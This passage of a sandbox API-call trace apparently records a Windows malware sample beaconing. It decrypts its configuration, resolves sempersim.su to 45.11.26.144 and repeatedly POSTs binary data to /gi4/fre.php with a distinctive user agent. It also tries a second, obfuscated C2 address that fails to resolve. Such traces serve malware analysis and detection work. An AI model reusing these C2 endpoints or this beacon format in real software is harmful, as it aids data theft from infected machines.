0x76600000 [0298.543] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0298.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.544] CryptDestroyKey (hKey=0x5be048) returned 1 [0298.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.545] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0298.545] GetProcessHeap () returned 0x5b0000 [0298.545] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0298.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.546] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0298.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.547] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0298.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.550] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0298.550] GetProcessHeap () returned 0x5b0000 [0298.551] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0298.551] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0298.552] GetProcessHeap () returned 0x5b0000 [0298.552] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0298.552] socket (af=2, type=1, protocol=6) returned 0x410 [0298.553] connect (s=0x410, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0298.632] FreeAddrInfoW (pAddrInfo=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0298.632] GetProcessHeap () returned 0x5b0000 [0298.632] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0298.632] GetProcessHeap () returned 0x5b0000 [0298.632] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0298.633] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0298.634] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0298.634] GetProcessHeap () returned 0x5b0000 [0298.634] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0298.634] GetProcessHeap () returned 0x5b0000 [0298.634] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0298.634] GetProcessHeap () returned 0x5b0000 [0298.634] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0298.634] GetProcessHeap () returned 0x5b0000 [0298.634] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0298.635] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0298.636] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0298.636] GetProcessHeap () returned 0x5b0000 [0298.636] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0298.636] GetProcessHeap () returned 0x5b0000 [0298.636] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0298.636] send (s=0x410, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0298.637] send (s=0x410, buf=0x5d1e18*, len=159, flags=0) returned 159 [0298.637] GetProcessHeap () returned 0x5b0000 [0298.637] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0298.637] recv (in: s=0x410, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0299.903] GetProcessHeap () returned 0x5b0000 [0299.904] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0299.904] GetProcessHeap () returned 0x5b0000 [0299.904] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0299.904] GetProcessHeap () returned 0x5b0000 [0299.904] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0299.904] GetProcessHeap () returned 0x5b0000 [0299.905] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0299.905] closesocket (s=0x410) returned 0 [0299.906] GetProcessHeap () returned 0x5b0000 [0299.906] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0299.906] GetProcessHeap () returned 0x5b0000 [0299.906] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0299.906] GetProcessHeap () returned 0x5b0000 [0299.906] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0299.906] GetProcessHeap () returned 0x5b0000 [0299.907] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0299.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xce0) returned 0x410 [0299.909] Sleep (dwMilliseconds=0xea60) [0299.921] GetProcessHeap () returned 0x5b0000 [0299.921] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0299.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.922] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0299.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.927] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0299.933] GetProcessHeap () returned 0x5b0000 [0299.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0299.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.934] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0299.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.935] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0299.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.936] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.936] GetProcessHeap () returned 0x5b0000 [0299.937] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0299.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.940] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0299.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.941] CryptDestroyKey (hKey=0x5bde08) returned 1 [0299.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.943] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0299.943] GetProcessHeap () returned 0x5b0000 [0299.943] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0299.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.944] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.945] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.946] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.947] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.947] GetProcessHeap () returned 0x5b0000 [0299.947] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0299.947] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0299.947] GetProcessHeap () returned 0x5b0000 [0299.948] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0299.948] GetProcessHeap () returned 0x5b0000 [0299.948] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0299.948] GetProcessHeap () returned 0x5b0000 [0299.949] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0299.949] GetProcessHeap () returned 0x5b0000 [0299.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0299.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.950] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0299.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.958] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0299.966] GetProcessHeap () returned 0x5b0000 [0299.966] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0299.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.967] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0299.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.968] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0299.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.969] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.969] GetProcessHeap () returned 0x5b0000 [0299.969] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0299.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.970] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0299.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.972] CryptDestroyKey (hKey=0x5be048) returned 1 [0299.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0299.973] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0299.973] GetProcessHeap () returned 0x5b0000 [0299.973] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0299.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.974] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0299.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.975] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0299.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.976] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0299.976] GetProcessHeap () returned 0x5b0000 [0299.976] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0299.976] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdc00*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0299.978] GetProcessHeap () returned 0x5b0000 [0299.978] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca960 [0299.978] socket (af=2, type=1, protocol=6) returned 0x414 [0299.978] connect (s=0x414, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0300.051] FreeAddrInfoW (pAddrInfo=0x5cdc00*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0300.051] GetProcessHeap () returned 0x5b0000 [0300.051] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0300.051] GetProcessHeap () returned 0x5b0000 [0300.051] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0300.052] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0300.053] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0300.053] GetProcessHeap () returned 0x5b0000 [0300.053] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0300.053] GetProcessHeap () returned 0x5b0000 [0300.053] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0300.053] GetProcessHeap () returned 0x5b0000 [0300.053] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0300.053] GetProcessHeap () returned 0x5b0000 [0300.053] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0300.054] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0300.055] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0300.055] GetProcessHeap () returned 0x5b0000 [0300.055] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0300.055] GetProcessHeap () returned 0x5b0000 [0300.055] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0300.055] send (s=0x414, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0300.056] send (s=0x414, buf=0x5d1e18*, len=159, flags=0) returned 159 [0300.057] GetProcessHeap () returned 0x5b0000 [0300.057] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0300.057] recv (in: s=0x414, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0301.224] GetProcessHeap () returned 0x5b0000 [0301.225] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0301.225] GetProcessHeap () returned 0x5b0000 [0301.225] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0301.225] GetProcessHeap () returned 0x5b0000 [0301.225] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0301.225] GetProcessHeap () returned 0x5b0000 [0301.226] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0301.226] closesocket (s=0x414) returned 0 [0301.226] GetProcessHeap () returned 0x5b0000 [0301.226] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca960 | out: hHeap=0x5b0000) returned 1 [0301.226] GetProcessHeap () returned 0x5b0000 [0301.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0301.227] GetProcessHeap () returned 0x5b0000 [0301.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0301.227] GetProcessHeap () returned 0x5b0000 [0301.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0301.228] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xce4) returned 0x414 [0301.229] Sleep (dwMilliseconds=0xea60) [0301.243] GetProcessHeap () returned 0x5b0000 [0301.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0301.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.245] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0301.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.252] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0301.258] GetProcessHeap () returned 0x5b0000 [0301.258] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0301.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.259] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0301.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.260] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0301.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.261] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.261] GetProcessHeap () returned 0x5b0000 [0301.261] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0301.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.262] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0301.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.280] CryptDestroyKey (hKey=0x5be288) returned 1 [0301.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.281] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0301.281] GetProcessHeap () returned 0x5b0000 [0301.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0301.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.282] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0301.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.283] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0301.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.284] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0301.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.285] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0301.285] GetProcessHeap () returned 0x5b0000 [0301.285] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0301.286] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0301.286] GetProcessHeap () returned 0x5b0000 [0301.286] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0301.286] GetProcessHeap () returned 0x5b0000 [0301.287] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0301.287] GetProcessHeap () returned 0x5b0000 [0301.287] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0301.287] GetProcessHeap () returned 0x5b0000 [0301.287] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3308 [0301.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.288] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0301.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.297] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0301.304] GetProcessHeap () returned 0x5b0000 [0301.304] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0301.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.305] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0301.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.306] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0301.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.307] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.307] GetProcessHeap () returned 0x5b0000 [0301.307] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0301.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.311] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3308, pdwDataLen=0xdfcfc | out: pbData=0x5d3308, pdwDataLen=0xdfcfc) returned 1 [0301.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.312] CryptDestroyKey (hKey=0x5be288) returned 1 [0301.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0301.313] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0301.313] GetProcessHeap () returned 0x5b0000 [0301.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0301.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.314] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0301.315] LoadLibraryW 